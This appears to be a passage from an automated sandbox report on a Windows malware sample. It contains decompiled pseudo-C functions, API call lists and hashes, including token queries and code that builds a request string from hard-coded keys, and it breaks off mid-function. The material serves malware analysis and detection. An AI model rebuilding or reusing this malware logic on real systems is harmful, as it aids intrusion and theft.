                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                          • String ID:
                                                          • API String ID: 58946197-0
                                                          • Opcode ID: 5c09665c6237fae85aa5546fc95c58704ebc6860425c7aa0ed15b178c2f65738
                                                          • Instruction ID: 2911a86ba3093720bd9df5986a2fb5b562af29e5e841e268d29b7841cde80ebd
                                                          • Opcode Fuzzy Hash: 5c09665c6237fae85aa5546fc95c58704ebc6860425c7aa0ed15b178c2f65738
                                                          • Instruction Fuzzy Hash: 7DF0D475A002C0ABF7288F64D999F1577F5EB19707B44A009F902E7360F77AEC00CA20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04635AF1, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 58%
                                                          			E04635AF1(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E0463A71F(_t2);
				if(_t34 != 0) {
					_t30 = E0463A71F(_t28);
					if(_t30 == 0) {
						E0463A734(_t34);
					} else {
						_t39 = _a4;
						_t22 = E0463A782(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E0463A782(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                          0x04635af1
                                                          0x04635afb
                                                          0x04635afd
                                                          0x04635b03
                                                          0x04635b03
                                                          0x04635b0c
                                                          0x04635b10
                                                          0x04635b1c
                                                          0x04635b20
                                                          0x04635b94
                                                          0x04635b22
                                                          0x04635b22
                                                          0x04635b26
                                                          0x04635b2b
                                                          0x04635b30
                                                          0x04635b4a
                                                          0x04635b39
                                                          0x04635b39
                                                          0x04635b3d
                                                          0x04635b40
                                                          0x04635b45
                                                          0x04635b45
                                                          0x04635b4f
                                                          0x04635b77
                                                          0x04635b7d
                                                          0x04635b80
                                                          0x04635b51
                                                          0x04635b53
                                                          0x04635b5b
                                                          0x04635b66
                                                          0x04635b6b
                                                          0x04635b6b
                                                          0x04635b87
                                                          0x04635b8e
                                                          0x04635b8f
                                                          0x04635b8f
                                                          0x04635b20
                                                          0x04635b9f

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,04633E08,?,?,?,?,00000102,046367B8,?,?,00000000), ref: 04635AFD
                                                            • Part of subcall function 0463A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04635595), ref: 0463A72B
                                                            • Part of subcall function 0463A782: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04635B2B,00000000,00000001,00000001,?,?,04633E08,?,?,?,?,00000102), ref: 0463A790
                                                            • Part of subcall function 0463A782: StrChrA.SHLWAPI(?,0000003F,?,?,04633E08,?,?,?,?,00000102,046367B8,?,?,00000000,00000000), ref: 0463A79A
                                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04633E08,?,?,?,?,00000102,046367B8,?), ref: 04635B5B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04635B6B
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04635B77
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3767559652-0
                                                          • Opcode ID: 4e8ba033856f4d4a060f9d7c45f38dd3a356dc30508ab84b25d242788f509c56
                                                          • Instruction ID: cea6cd8332b6bea221a5898a693f400339d608d4d5e5ffc654fc67742c243039
                                                          • Opcode Fuzzy Hash: 4e8ba033856f4d4a060f9d7c45f38dd3a356dc30508ab84b25d242788f509c56
                                                          • Instruction Fuzzy Hash: 5A210F765002D5FBDB126FB4CC94AAABFB9EF16286B054094F8069F201F735E90197E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 046345C6, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E046345C6(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E0463A71F(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                          0x046345db
                                                          0x046345df
                                                          0x046345e9
                                                          0x046345ee
                                                          0x046345f3
                                                          0x046345f5
                                                          0x046345fd
                                                          0x04634602
                                                          0x04634610
                                                          0x04634615
                                                          0x0463461f

                                                          APIs
                                                          • lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,04EC935C,?,04638D93,004F0053,04EC935C,?,?,?,?,?,?,0463523E), ref: 046345D6
                                                          • lstrlenW.KERNEL32(04638D93,?,04638D93,004F0053,04EC935C,?,?,?,?,?,?,0463523E), ref: 046345DD
                                                            • Part of subcall function 0463A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04635595), ref: 0463A72B
                                                          • memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,04638D93,004F0053,04EC935C,?,?,?,?,?,?,0463523E), ref: 046345FD
                                                          • memcpy.NTDLL(74B069A0,04638D93,00000002,00000000,004F0053,74B069A0,?,?,04638D93,004F0053,04EC935C), ref: 04634610
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlenmemcpy$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 2411391700-0
                                                          • Opcode ID: 0b986ec248656c1334e265fb42acabcb86f785ff3fed1c67b6deaf85dbeb96c9
                                                          • Instruction ID: 6e564d832996385481c920ec7d371ddc524a9014853c7238a72e009760ce01dd
                                                          • Opcode Fuzzy Hash: 0b986ec248656c1334e265fb42acabcb86f785ff3fed1c67b6deaf85dbeb96c9
                                                          • Instruction Fuzzy Hash: 3BF04936900118BBDF11EFA8CC84C9FBBACEF092597114066FA04D7201FB35EA149BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0463361A, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(04EC9A78,00000000,00000000,7742C740,046320ED,00000000), ref: 0463362A
                                                          • lstrlen.KERNEL32(?), ref: 04633632
                                                            • Part of subcall function 0463A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04635595), ref: 0463A72B
                                                          • lstrcpy.KERNEL32(00000000,04EC9A78), ref: 04633646
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04633651
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                          • String ID:
                                                          • API String ID: 74227042-0
                                                          • Opcode ID: a14d763c687176a9d93515b4396a6198380cc3de2fd63feaac7416c5bdc1051a
                                                          • Instruction ID: 694a8923a31f981d9ffef05e88514e4645bf3044264ee2c674251b7b1be16f8f
                                                          • Opcode Fuzzy Hash: a14d763c687176a9d93515b4396a6198380cc3de2fd63feaac7416c5bdc1051a
                                                          • Instruction Fuzzy Hash: 65E012735016A16B8711ABE4AC48C6BBBBDEF996527040417F700E3211E73ADC059BA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Analysis Process: rundll32.exe PID: 7148 Parent PID: 1112 rundll32.exeCOMMON

                                                          Executed Functions

                                                          Function 04675A27, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 38%
                                                          			E04675A27(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E0467A71F(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E0467A734(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                          0x04675a34
                                                          0x04675a35
                                                          0x04675a36
                                                          0x04675a37
                                                          0x04675a38
                                                          0x04675a3c
                                                          0x04675a43
                                                          0x04675a52
                                                          0x04675a55
                                                          0x04675a58
                                                          0x04675a5f
                                                          0x04675a62
                                                          0x04675a65
                                                          0x04675a68
                                                          0x04675a6b
                                                          0x04675a76
                                                          0x04675a78
                                                          0x04675a81
                                                          0x04675a89
                                                          0x04675a8b
                                                          0x04675a9d
                                                          0x04675aa7
                                                          0x04675aab
                                                          0x04675aba
                                                          0x04675abe
                                                          0x04675ac7
                                                          0x04675acf
                                                          0x04675acf
                                                          0x04675ad1
                                                          0x04675ad1
                                                          0x04675ad9
                                                          0x04675adf
                                                          0x04675ae3
                                                          0x04675ae3
                                                          0x04675aee

                                                          APIs
                                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04675A6E
                                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04675A81
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04675A9D
                                                            • Part of subcall function 0467A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04675595), ref: 0467A72B
                                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04675ABA
                                                          • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04675AC7
                                                          • NtClose.NTDLL(?), ref: 04675AD9
                                                          • NtClose.NTDLL(00000000), ref: 04675AE3
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                          • String ID:
                                                          • API String ID: 2575439697-0
                                                          • Opcode ID: c0cc7aeba4ac9b09ed8404ec0d379beb73e0cc1539ad195c3d4f87ee59e9df26
                                                          • Instruction ID: 1dcb5fc385487142d55bac56490e617039854015ca43dd1b3837e68a16ae932d
                                                          • Opcode Fuzzy Hash: c0cc7aeba4ac9b09ed8404ec0d379beb73e0cc1539ad195c3d4f87ee59e9df26
                                                          • Instruction Fuzzy Hash: 0F21E672900218BBDB01AF95CC85ADEBFBDFF48750F104066FA06E6110E7769A449BE4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04674AB6, Relevance: 33.2, APIs: 22, Instructions: 244memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E04674AB6(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t100;
				signed int _t104;
				char** _t106;
				int _t109;
				signed int _t111;
				intOrPtr* _t112;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				intOrPtr _t126;
				int _t130;
				CHAR* _t132;
				intOrPtr _t133;
				void* _t134;
				void* _t143;
				int _t144;
				void* _t145;
				intOrPtr _t146;
				void* _t148;
				long _t152;
				intOrPtr* _t153;
				intOrPtr* _t154;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t143 = __edx;
				_t134 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x467d018; // 0xf1c1aee9
				asm("bswap eax");
				_t61 =  *0x467d014; // 0x3a87c8cd
				_t132 = _a16;
				asm("bswap eax");
				_t62 =  *0x467d010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x467d00c; // 0xeec43f25
				asm("bswap eax");
				_t64 =  *0x467d2a8; // 0x47a5a8
				_t3 = _t64 + 0x467e633; // 0x74666f73
				_t144 = wsprintfA(_t132, _t3, 3, 0x3d15e, _t63, _t62, _t61, _t60,  *0x467d02c,  *0x467d004, _t59);
				_t67 = E046756CD();
				_t68 =  *0x467d2a8; // 0x47a5a8
				_t4 = _t68 + 0x467e673; // 0x74707526
				_t71 = wsprintfA(_t144 + _t132, _t4, _t67);
				_t160 = _t158 + 0x38;
				_t145 = _t144 + _t71; // executed
				_t72 = E046758DB(_t134); // executed
				_t133 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t126 =  *0x467d2a8; // 0x47a5a8
					_t7 = _t126 + 0x467e8d4; // 0x736e6426
					_t130 = wsprintfA(_a16 + _t145, _t7, _t72);
					_t160 = _t160 + 0xc;
					_t145 = _t145 + _t130;
					HeapFree( *0x467d238, 0, _v8);
				}
				_t73 = E0467A199();
				_v8 = _t73;
				if(_t73 != 0) {
					_t121 =  *0x467d2a8; // 0x47a5a8
					_t11 = _t121 + 0x467e8dc; // 0x6f687726
					wsprintfA(_t145 + _a16, _t11, _t73);
					_t160 = _t160 + 0xc;
					HeapFree( *0x467d238, 0, _v8);
				}
				_t146 =  *0x467d32c; // 0x4af95b0
				_t75 = E04674622( &E0467D00A, _t146 + 4);
				_t152 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					RtlFreeHeap( *0x467d238, _t152, _a16); // executed
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x467d238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x467d238, _t152, _v20);
						goto L26;
					}
					E0467518F(GetTickCount());
					_t82 =  *0x467d32c; // 0x4af95b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x467d32c; // 0x4af95b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x467d32c; // 0x4af95b0
					_t148 = E04671BB6(1, _t143, _a16,  *_t88);
					_v28 = _t148;
					asm("lock xadd [eax], ecx");
					if(_t148 == 0) {
						L24:
						HeapFree( *0x467d238, _t152, _v8);
						goto L25;
					}
					StrTrimA(_t148, 0x467c28c);
					_push(_t148);
					_t94 = E0467361A();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x467d238, _t152, _t148);
						goto L24;
					}
					_t153 = __imp__;
					 *_t153(_t148, _a4);
					 *_t153(_v8, _v20);
					_t154 = __imp__;
					 *_t154(_v8, _v16);
					_t100 = E04679070( *_t154(_v8, _t148), _v8);
					_a4 = _t100;
					if(_t100 == 0) {
						_v12 = 8;
						L21:
						E04676761();
						L22:
						HeapFree( *0x467d238, 0, _v16);
						_t152 = 0;
						goto L23;
					}
					_t104 = E046769B4(_t133, 0xffffffffffffffff, _t148,  &_v24); // executed
					_v12 = _t104;
					if(_t104 == 0) {
						_t157 = _v24;
						_t111 = E0467391F(_t157, _a4, _a8, _a12); // executed
						_v12 = _t111;
						_t112 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t112 + 0x80))(_t112);
						_t114 =  *((intOrPtr*)(_t157 + 8));
						 *((intOrPtr*)( *_t114 + 8))(_t114);
						_t116 =  *((intOrPtr*)(_t157 + 4));
						 *((intOrPtr*)( *_t116 + 8))(_t116);
						_t118 =  *_t157;
						 *((intOrPtr*)( *_t118 + 8))(_t118);
						E0467A734(_t157);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t106 = _a8;
							if(_t106 != 0) {
								_t149 =  *_t106;
								_t155 =  *_a12;
								wcstombs( *_t106,  *_t106,  *_a12);
								_t109 = E04675800(_t149, _t149, _t155 >> 1);
								_t148 = _v28;
								 *_a12 = _t109;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E0467A734(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}






















































                                                          0x04674ab6
                                                          0x04674ab6
                                                          0x04674ab6
                                                          0x04674abf
                                                          0x04674ac8
                                                          0x04674aca
                                                          0x04674aca
                                                          0x04674ad7
                                                          0x04674ae2
                                                          0x04674ae5
                                                          0x04674aea
                                                          0x04674af3
                                                          0x04674af6
                                                          0x04674afb
                                                          0x04674afe
                                                          0x04674b03
                                                          0x04674b06
                                                          0x04674b12
                                                          0x04674b1f
                                                          0x04674b21
                                                          0x04674b27
                                                          0x04674b2c
                                                          0x04674b37
                                                          0x04674b39
                                                          0x04674b3c
                                                          0x04674b3e
                                                          0x04674b43
                                                          0x04674b49
                                                          0x04674b4e
                                                          0x04674b51
                                                          0x04674b56
                                                          0x04674b63
                                                          0x04674b65
                                                          0x04674b6b
                                                          0x04674b75
                                                          0x04674b75
                                                          0x04674b77
                                                          0x04674b7c
                                                          0x04674b81
                                                          0x04674b84
                                                          0x04674b89
                                                          0x04674b96
                                                          0x04674b98
                                                          0x04674ba6
                                                          0x04674ba6
                                                          0x04674ba8
                                                          0x04674bb6
                                                          0x04674bbb
                                                          0x04674bbd
                                                          0x04674bc2
                                                          0x04674d83
                                                          0x04674d8d
                                                          0x04674d96
                                                          0x04674bc8
                                                          0x04674bd4
                                                          0x04674bda
                                                          0x04674bdf
                                                          0x04674d77
                                                          0x04674d81
                                                          0x00000000
                                                          0x04674d81
                                                          0x04674beb
                                                          0x04674bf0
                                                          0x04674bf9
                                                          0x04674c0a
                                                          0x04674c0e
                                                          0x04674c17
                                                          0x04674c1d
                                                          0x04674c2c
                                                          0x04674c33
                                                          0x04674c3c
                                                          0x04674c42
                                                          0x04674d6b
                                                          0x04674d75
                                                          0x00000000
                                                          0x04674d75
                                                          0x04674c4e
                                                          0x04674c54
                                                          0x04674c55
                                                          0x04674c5a
                                                          0x04674c5f
                                                          0x04674d61
                                                          0x04674d69
                                                          0x00000000
                                                          0x04674d69
                                                          0x04674c68
                                                          0x04674c6f
                                                          0x04674c77
                                                          0x04674c7c
                                                          0x04674c85
                                                          0x04674c90
                                                          0x04674c95
                                                          0x04674c9a
                                                          0x04674d99
                                                          0x04674d4d
                                                          0x04674d4d
                                                          0x04674d52
                                                          0x04674d5d
                                                          0x04674d5f
                                                          0x00000000
                                                          0x04674d5f
                                                          0x04674ca4
                                                          0x04674ca9
                                                          0x04674cae
                                                          0x04674cb3
                                                          0x04674cbe
                                                          0x04674cc3
                                                          0x04674cc6
                                                          0x04674ccc
                                                          0x04674cd2
                                                          0x04674cd8
                                                          0x04674cdb
                                                          0x04674ce1
                                                          0x04674ce4
                                                          0x04674ce9
                                                          0x04674ced
                                                          0x04674ced
                                                          0x04674cf9
                                                          0x04674d05
                                                          0x04674d09
                                                          0x04674d0b
                                                          0x04674d10
                                                          0x04674d12
                                                          0x04674d17
                                                          0x04674d1c
                                                          0x04674d29
                                                          0x04674d31
                                                          0x04674d34
                                                          0x04674d34
                                                          0x04674d10
                                                          0x00000000
                                                          0x04674cfb
                                                          0x04674cff
                                                          0x04674d36
                                                          0x04674d39
                                                          0x04674d42
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04674d42
                                                          0x04674d01
                                                          0x00000000
                                                          0x04674d01
                                                          0x04674cf9

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04674ACA
                                                          • wsprintfA.USER32 ref: 04674B1A
                                                          • wsprintfA.USER32 ref: 04674B37
                                                          • wsprintfA.USER32 ref: 04674B63
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04674B75
                                                          • wsprintfA.USER32 ref: 04674B96
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04674BA6
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04674BD4
                                                          • GetTickCount.KERNEL32 ref: 04674BE5
                                                          • RtlEnterCriticalSection.NTDLL(04AF9570), ref: 04674BF9
                                                          • RtlLeaveCriticalSection.NTDLL(04AF9570), ref: 04674C17
                                                            • Part of subcall function 04671BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,046720C2,?,04AF95B0), ref: 04671BE1
                                                            • Part of subcall function 04671BB6: lstrlen.KERNEL32(?,?,?,046720C2,?,04AF95B0), ref: 04671BE9
                                                            • Part of subcall function 04671BB6: strcpy.NTDLL ref: 04671C00
                                                            • Part of subcall function 04671BB6: lstrcat.KERNEL32(00000000,?), ref: 04671C0B
                                                            • Part of subcall function 04671BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,046720C2,?,04AF95B0), ref: 04671C28
                                                          • StrTrimA.SHLWAPI(00000000,0467C28C,?,04AF95B0), ref: 04674C4E
                                                            • Part of subcall function 0467361A: lstrlen.KERNEL32(04AF9A78,00000000,00000000,7742C740,046720ED,00000000), ref: 0467362A
                                                            • Part of subcall function 0467361A: lstrlen.KERNEL32(?), ref: 04673632
                                                            • Part of subcall function 0467361A: lstrcpy.KERNEL32(00000000,04AF9A78), ref: 04673646
                                                            • Part of subcall function 0467361A: lstrcat.KERNEL32(00000000,?), ref: 04673651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04674C6F
                                                          • lstrcpy.KERNEL32(?,?), ref: 04674C77
                                                          • lstrcat.KERNEL32(?,?), ref: 04674C85
                                                          • lstrcat.KERNEL32(?,00000000), ref: 04674C8B
                                                            • Part of subcall function 04679070: lstrlen.KERNEL32(?,00000000,04AF9A98,00000000,04678808,04AF9C76,?,?,?,?,?,63699BC3,00000005,0467D00C), ref: 04679077
                                                            • Part of subcall function 04679070: mbstowcs.NTDLL ref: 046790A0
                                                            • Part of subcall function 04679070: memset.NTDLL ref: 046790B2
                                                          • wcstombs.NTDLL ref: 04674D1C
                                                            • Part of subcall function 0467391F: SysAllocString.OLEAUT32(?), ref: 0467395A
                                                            • Part of subcall function 0467391F: IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 046739DD
                                                            • Part of subcall function 0467A734: HeapFree.KERNEL32(00000000,00000000,04675637,00000000,?,?,00000000), ref: 0467A740
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 04674D5D
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04674D69
                                                          • HeapFree.KERNEL32(00000000,?,?,04AF95B0), ref: 04674D75
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04674D81
                                                          • RtlFreeHeap.NTDLL(00000000,?), ref: 04674D8D
                                                          Memory Dump Source
                                                          • Source File: 00000021.00000002.441722403.0000000004671000.00000020.00000001.sdmp, Offset: 04670000, based on PE: true
                                                          • Associated: 00000021.00000002.441685163.0000000004670000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441773564.000000000467C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441805771.000000000467D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000021.00000002.441874516.000000000467F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                          • String ID:
                                                          • API String ID: 603507560-0
                                                          • Opcode ID: 2d1364610b7a57dfbea259edad36fbfe2d19ea13c2640fb93c934d6a644ac7de
                                                          • Instruction ID: a3ae74d1cfb19acda352d530010cf9e43366b2bf78a5bdcbf4d35b3a7af71135
                                                          • Opcode Fuzzy Hash: 2d1364610b7a57dfbea259edad36fbfe2d19ea13c2640fb93c934d6a644ac7de
                                                          • Instruction Fuzzy Hash: FD914771900108BFDB15DFA8DC88AAE7BB9EF48354F144455F909E7220EB39ED51DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0467AC55, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 51%
                                                          			E0467AC55(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x4670000;
				_t115 = _t139[3] + 0x4670000;
				_t131 = _t139[4] + 0x4670000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x4670000;
				_v16 = _t139[5] + 0x4670000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x4670002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x467d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x467d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x467d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
